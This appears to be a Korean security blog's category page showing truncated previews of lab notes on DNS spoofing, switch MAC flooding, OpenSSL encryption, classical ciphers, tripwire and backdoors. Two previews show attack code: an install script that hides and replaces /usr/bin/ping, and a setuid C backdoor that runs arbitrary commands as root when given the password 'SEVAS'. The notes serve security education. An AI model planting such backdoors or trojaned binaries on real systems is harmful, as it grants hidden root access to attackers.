본문 바로가기

보안

 (14)
리눅스 DNS Spoofing 1. DNS Spoofing1. DNS 주소를 변조 다른 페이지가 나오도록 한다 2. 보안 대책 : mac-table 고정시켜 spoofing 자체를 차단  - 정상 루트- DNS Spoofing 위 그림처럼 되면 예를 들어 www.naver.com에 접속을 할려 했을 때 공격자가 naver에 dns를 변조시켜 변조된 사이트에 접속하면 본래의 naver.com 대신 변조된 사이트만 접속하게 된다  2. 실습 세팅 - Rocky dns - Kali 위조할 dns  - 웹 사이트 사용 코드   2. 실습 시 kali에서 사용할 명령어  - fragrouter  - ip 스푸퓡에서 사용 - 패킷을분할 및 재조립에 사용 - dnsspoof - 칼리에서 dns 스푸핑 테스트 사용 도구 (네트워크 dns 요청을 가..
리눅스 Switch_Jamming 1. mac table을 가득차게 해서 통신을 원할하지 않게 한다.  - kali - gns3 switch  - 보안 방법1. mac-table 고정2. 임시적으로 switch에서 mac-address-table static (mac주소) int fa[번호] vlan 1 으로 dynamic에서 static으로 변경
암호학 2 #openssl 암호화  ecb - 블록 암호화 / 순차적으로 암호화 / 한개의 블록만 해독되어도 나머지 블록도 해독cbc = 가장 많이 사용 / xor연산을 통해 이전 암호문과 연산 / salt 값이 들어가는 방식 / 계속 암호화 대상 값을 변경cfb = 블록 암호화 스트림 방식 (들어오는 대로 바로 바로 ) / 키가 먼저 들어오면  (재사용)/ "암호화 복호화모두 암호화"ofb = cfb와 유사 / 암호화 함수는 키 생성에만 사용(최초에만 사용) /  "암호화 복호화 통합"ctr = 1씩 증가 /  aes = 블록 암호화 / 128비트          암호가 틀리면 안나온다 쉽게 하기 탭을 누르면서 하기 # 파일 암호화          #공개키 개인키 만들기 개인키  공개키    암호화 진행     ..
암호학 & 패스워드 크래킹 #1 스테가노 그래피원래 메세지를 사진등의 다른 매체로 숨긴다 #2 전자 암호화메세지 어순 변경 (예: gge = egg) #3 환자 암호화 (시저스 암호)문자 배열을 밀어내거나 바꾼다 (예: ecv = cat) 이유cdeabctuv두 자리씩 자릿수를 밀어내 어순을 바꾼다  #4 비제네르 암호화"key"최초로 key 사용  20세기 암호화(전쟁)1 ~ 2차 서계대전을 기준으로 아날로그에서 => 전자식 에니그마암호화 (세르비우스) , 엘런튜링 => 현대 암호학  ============================================2세대 현대 암호학 (특징: key를 활용) 보안의 3요소기밀성(3자가 알 수 없게)무결성(위변조 불가)가용성(사용시간 유지)  복호화암호화된 데이터를 원래의 형태로 되..
무결성 검사 & Revers & xinet #1 tripwire (무결성 점검 도구) 키 세팅엔터 3번    백업이 있기 때문에 다 삭제 후 내용 추가  [정책적용] twadmin --create-polfile twpol.txt [구동] tripwire --init[확인] tripwire --check    권한 주기 다른 계정에서 vi install.sh > 쉘 코드 생성 내용 넣기  [root@db ping]# vi install.sh  if [ -f /usr/bin/.ping ]thenecho "이미 설치되어있습니다"elsemkdir - p /backupcp /usr/bin/ping   /backupgcc -o /back/fping  /back/fping.c || exitmv /usr/bin/ping   /usr/bin/.pingmv  /b..
백도어 사용 장비 vmware, gns3준비vmnet1 통일백도어컴퓨터 시스템, 네트워크에 몰래 접근하는 숨겨진 통로 gns  kali   rocky 확인 kali rocky  설치 진행    확장자 c는 c언어     sevas 로그인 아무것도 안나옴 관리자 권한 주기 (setuid)  다시 sevas 로그인 root로 변경 됨 #2 문제 include(헤더): 준비물 ping 복사  #include  #include  #include  #include  int main(int argc, char **argv) {         setuid(0);         if(!strcmp(argv[1], "SEVAS"))                 {                 system(argv[2]);   ..

티스토리툴바